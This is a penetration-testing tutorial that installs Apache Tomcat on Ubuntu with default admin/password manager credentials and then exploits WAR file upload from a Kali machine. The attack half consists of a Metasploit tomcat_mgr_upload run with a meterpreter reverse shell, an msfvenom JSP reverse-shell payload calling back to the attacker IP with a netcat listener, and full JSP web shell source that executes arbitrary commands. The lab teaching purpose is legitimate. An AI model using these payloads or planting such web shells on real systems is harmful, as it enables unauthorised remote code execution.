Tomcat Penetration Testing

In this article, we are going to setup the Tomcat server on the ubuntu machine and exploit the file upload vulnerability. Following are the machines:

Target Machine: Ubuntu (192.168.1.5)

Attacker Machine: Kali Linux (192.168.1.7)

Installation

Apache Tomcat relies on Java, meaning you’ll need to have the Java JDK installed on your server. You can install it by running the command below:

apt install openjdk-11-jdk

Add a new user by the name tomcat using the following command:

useradd -m -U -d /opt/tomcat -s /bin/false tomcat

Download the Tomcat tar.gz file from the official website.

Download the latest version from the website into the ubuntu machine and extract the downloaded files.

wget https://archive.apache.org/dist/tomcat/tomtar -xvf apache-tomcat-10.1.20.tar.gz

tar -xvf apache-tomcat-10.1.20.tar.gz

Move the extracted folder in the /opt/tomcat directory, give the ownership permissions to tomcat user and set the execution permission on binary files.

mv apache-tomcat-10.1.20/* /opt/tomcat

chown -R tomcat: /opt/tomcat

sh -c 'chmod +x /opt/tomcat/bin/*.sh '

Create a tomcat.service file in the /etc/systemd/system/ directory and add the following content in the file:

[Unit]

Description=Apache Tomcat

After=network.target

[Service]

Type=forking

User=tomcat

Group=tomcat

Environment=JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64

Environment=CATALINA_PID=/opt/tomcat/tomcat.pid

Environment=CATALINA_HOME=/opt/tomcat

Environment=CATALINA_BASE=/opt/tomcat

Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"

ExecStart=/opt/tomcat/bin/startup.sh

ExecStop=/opt/tomcat/bin/shutdown.sh

ExecReload=/bin/kill $MAINPID

RemainAfterExit=yes

[Install]

WantedBy=multi-user.target

Reload the systemd daemon to apply the changes using the following command:

systemctl daemon-reload

 Also, enable the tomcat service to start at system reboot.

systemctl enable --now tomcat

Checking the status of the tomcat server:

systemctl status tomcat

Configuration

After the installation is complete, its time to configure the Tomcat server.

To create admin user password, make changes in the following file:

nano /opt/tomcat/conf/tomcat-users.xml

Add the following code above the </tomcat-users>:

<role rolename="admin-gui"/>

<role rolename="manager-gui"/>

<user username="admin" password="password" roles="admin-gui,manager-gui"/>

To enable remote access for Tomcat Manager, make the following changes in the context.xml file present in the manager and host-manager directory.

nano /opt/tomcat/webapps/manager/META-INF/context.xml

nano /opt/tomcat/webapps/host-manager/META-INF/context.xml

Remove the following line from both the above files as shown below:

Once done with the changes, restart the tomcat service in ubuntu.

systemctl restart tomcat

Observe that the Tomcat server is up and running on port 8080 in the ubuntu machine.

Enumeration

After the installation and configuration is complete, now starting the enumeration phase.

Using Kali linux as an attacker machine, initial enumeration can be performed using nmap.

nmap -p 8080 -sV 192.168.1.5

Exploitation using Metasploit Framework

First trying to exploit the functionality using Metasploit as an exploit is already available for the tomcat file upload vulnerability. The exploit used here is exploit/multi/http/tomcat_mgr_upload.

Inside Metasploit, type the below given commands to run the exploit:

use exploit/multi/http/tomcat_mgr_upload

set rhosts 192.168.1.5

set report 8080

set httpusername admin

set httppassword password

show targets

set target 2

set payload linux/x86/meterpreter_reverse_tcp

exploit

From above it can be seen that a reverse shell is obtained and the commands can be executed using the meterpreter shell.

Exploiting Manually (Reverse Shell)

The above exploitation process can also be performed manually. In order to do that we first need to create a .war file using msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.1.7 lport=1234 -f war > shell.war

After the shell.war file has been created, we need to upload that file inside tomcat manager app.

To access the Manager App, it will require a basic authentication. The username can be given as admin and password as password to access the manager app.

After login into the Manager App, upload the above created shell.war file in the War file to deploy functionality.

Once the file is uploaded it can be seen in the uploaded files section.

Before accessing the uploaded file, start a netcat listener on port 1234.

rlwrap nc -lvnp 1234

Click on the /shell to access the file to obtain a reverse shell.

The reverse shell is obtained at port 1234.

Exploiting Manually (Web Shell)

To get a web shell, a .war file can be used which will contain .jsp files such that after the .war file is uploaded to the server the webshell is obtained.

To create a .war containing the .jsp files java is required in the kali linux machine.

apt install openjdk-11-jdk

Now, create a webshell directory, within it we will place the index.jsp file.

mkdir webshell

cd webshell

nano index.jsp

Copy the following code in the index.jsp file for the web shell.

<FORM METHOD=GET ACTION='index.jsp'>

<INPUT name='cmd' type=text>

<INPUT type=submit value='Run'>

</FORM>

<%@ page import="java.io.*" %>

<%

String cmd = request.getParameter("cmd");

String output = "";

if(cmd != null) {

String s = null;

try {

Process p = Runtime.getRuntime().exec(cmd,null,null);

BufferedReader sI = new BufferedReader(new

InputStreamReader(p.getInputStream()));

while((s = sI.readLine()) != null) { output += s+"</br>"; }

} catch(IOException e) { e.printStackTrace(); }

}

%>

<pre><%=output %></pre>

After the index.jsp file is created, the package can now be created after converting the directory into a .war file.

jar -cvf ../webshell.war *

After the webshell.war file is created, uploading it in the deploy functionality.

The index.jsp page can be accessed within the uploaded webshell directory and a webshell is obtained.

An alternative way to do the above manual exploitation can by downloading the cmd.jsp file and creating a webshell.war file using zip.

The webshell jsp file can be downloaded from here:

https://github.com/tennc/webshell/tree/master/fuzzdb-webshell/jsp

After the cmd.jsp file is downloaded, a revshell.war file can be created using the following command:

zip -r revshell.war cmd.jsp

Again, repeating the same procedure as discussed earlier, after uploading the revshell.war file in the deploy functionality. The web shell is obtained after accessing the file at the path: http://192.168.1.5:8080/revshell/cmd.jsp

Conclusion

In essence, Apache Tomcat remains a preferred choice for deploying Java web applications, offering a blend of versatility and security that caters to the diverse needs of developers and administrators alike. However, due to misconfigurations it can be abused to perform certain unintended actions like Remote Code Execution.